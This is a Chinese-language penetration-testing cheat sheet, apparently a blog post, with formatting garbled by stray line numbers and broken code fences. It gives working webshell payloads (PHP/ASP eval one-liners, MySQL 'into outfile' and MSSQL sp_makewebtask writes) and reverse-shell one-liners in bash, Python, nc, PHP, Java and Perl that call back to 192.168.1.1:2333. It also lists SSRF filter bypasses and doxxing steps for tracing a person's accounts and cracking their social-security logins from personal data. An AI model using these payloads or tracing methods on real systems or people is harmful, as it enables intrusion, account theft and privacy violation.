网络协议的分层

七层协议 五层协议 功能 类型 类型 类型 类型 类型
应用层 应用层 实现具体的应用功能 POP3 Samba
表示层 数据的格式与表达、加密、压缩 FTP HTTP CIFS DHCP TFTP
会话层 建立、管理和终止会话 Telnet SMTP NFS SNMP DNS
传输层 传输层 端到端的链接 TCP UDP
网络层 网络层 分组传输与路由选择 IP ICMP IGMP ARP RARP
数据链路层 传送以帧为单位的信息
物理层 二进制传输 以太网 令牌环 帧中继 ATM

拿shell方法

文件包含拿shell

将webshell以txt文件上传,然后上传一个脚本文件包含该txt文件,从而绕过waf

asp文件包含
  • 调用的文件和被调用的文件处于同级目录:
    file
    1
    + 调用的文件和被调用的文件处于不同级目录:```<!--#include virtual="dir/123.jpg"-->
php文件包含
1
<?php include('123.jpg');?>
sql一句话拿shell
mysql

phpmyadmin在知道网站路径的情况下

  • TABLE study (cmd text NOT NULL);
    1
    2
    3
    Insert INTO study (cmd) VALUES ('<?php eval ($POST[cmd]) ?>');
    select cmd from study into outfile 'D:/phpstudy/www/x.php'
    Drop TABLE IF EXISTS study;
  • "" into outfile 'd:/phpstudy/www.xa.php' ```
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12

    ###### phpstudy可能的路径 ######

    + D://phpStudy/Apache/conf/httpd.conf/
    + /usr/local/mysql
    + /usr/local/apache/conf/httpd.conf
    + /usr/local/httpd/conf/httpd.conf
    + /etc/httpd/conf/httpd.conf

    ###### sqlserver ######

    + ``` ;exec%20sp_makewebtask%20%20%27c:\inetpub\wwwroot\ms\x1.asp%27,%27<%execute(request("cmd"))%>%27%27%27--
网站配置插马拿shell
  • “%><%eval request("test")%><%”
反弹shell
  1. bash反弹shell
    • bash -i /dev/tcp/192.168.1.1/2333 0>&1 2>&1
    • bash -i >& /dev/tcp/192.168.1.1/2333 0>&1
    • exec 5<>/dev/tcp/192.168.1.1/2333;cat <&5|while read line;do $line >&5 2>&1;done
  2. python
    • python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.1.1”,2333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/bash”,”-i”]);’
  3. nc
    • nc 192.168.1.1 2333 -t -e /bin/bash
  4. php
    • php -r ‘$sock=fsockopen(“192.168.1.1”,2333);exec(“/bin/sh -i <&3 >&3 2>&3”);’
  5. java

    • r = Runtime.getRuntime(); p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/192.168.1.1/2333;cat <&5 | while read line; do $line 2>&5 >&5; done”] as String[]); p.waitFor()
  6. perl

    • perl -e ‘use Socket;$i=”192.168.1.1”;$p=2333;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
  7. powershell

web应用指纹分析

  1. 分析响应头字段

    • server
    • X-Powered-By
    • Set-cookie
    • 其他特殊字段
  2. 分析HTML

    • 特殊文本
    • 特殊clase
    • 特殊meta标签
    • script标签
  3. 分析URL

    • 目录结构特征
    • 默认错误页面
    • robots.txt
  4. logo文件

  5. 默认端口

  6. Nmap OS 指纹
  7. SSL证书信息

社工

社交信息收集
  1. 查看注册的网站
    • 0xreg
    • reg007
  2. 去账号以注册过的网站找回密码
    • 找回密码,判断账号是否存在
    • 输入账户和密码,如果提示密码错误,说明用户名存在
    • 直接使用该账户注册,若存在则提示已注册
  3. 知道qq
    • 通过qq邮箱搜索支付宝、淘宝账户
    • 去腾讯微博搜索
    • 查看qq空间
  4. 知道手机号
    • 在常见网站通过2来判断是否在该平台注册过账户
    • 通过在支付宝输入常见姓氏获取名字
  5. 通过职业找该领域常用社交网站反查
  6. 根据在qq空间、朋友圈等动态用百度识图识别图片,在常见社交平台搜索关键字
  7. 注意社交动态
    • 发布时间线
    • 使用的客户端(苹果、安卓、普通浏览器)
    • 注意每条链接/图片/视频
    • 从最早发布的动态向后查
  8. 一般人不同账户的用户名都是相同或者相近的
  9. 一般人社交头像都是相同的
  10. 一般人所有账号密码通用
  11. 大部分信息可以用来生成密码字典,尝试破解社保、公积金账户等
密码生成
  1. 生日密码
  2. 通过用户身边朋友或者家人的姓名或者出生日期进行猜解
  3. 系统默认密码
  4. 常见弱口令
钓鱼
  1. 使用虚假邮件
  2. 使用虚假网络
  3. 使用IM程序
  4. 种马

编辑器漏洞

fckeditor
ueditor
ckfinder
CKEditor
KindEditor
ewebeditor
常用拿shell
  1. 数据库备份拿shell
  2. 双文件上传
  3. 配置插马
  4. 修改文件上传类型直接上传
  5. iis写权限拿shell
  6. 命令执行拿shell
  7. 注入拿shell
  8. 前台用户头像上传拿shell
  9. strusts2拿shell
  10. java反序列化拿shell

SSRF

定义
原理
漏洞常见位置
利用姿势
  1. http协议
  2. file协议
  3. gopher协议
  4. dict协议
  5. www.xxx.com/test.php?image-http://服务器内网地址,如果存在内网地址返回状态码1xx和2xx,不存在就返回其他状态码
绕过
  1. ip换成域名
  2. IP换成10进制
  3. http://xxx.com@baidu.com
  4. 302跳转
  5. 直接访问127.0.0.1和使用localhost域名
  6. 试试IPv6
  7. 使用0.0.0.0代替127.0.0.1
  8. 使用xray自带的反连平台做302跳转。示例文章https://www.freebuf.com/sectool/213767.html
  9. IP限制绕过(xip.io,十进制IP,八进制IP)
  10. 协议限制绕过(Redirect,CRLF header injection)调用系统支持的协议和方法
  11. 采用短网址绕过,比如百度短地址https://dwz.cn/。
  12. 采用可以指向任意域名的xip.io,127.0.0.1.xip.io,可以解析为127.0.0.1
  13. 采用进制转换,127.0.0.1八进制:0177.0.0.1。十六进制:0x7f.0.0.1。十进制:2130706433

参考https://www.t99ls.net/articles-41070.html

,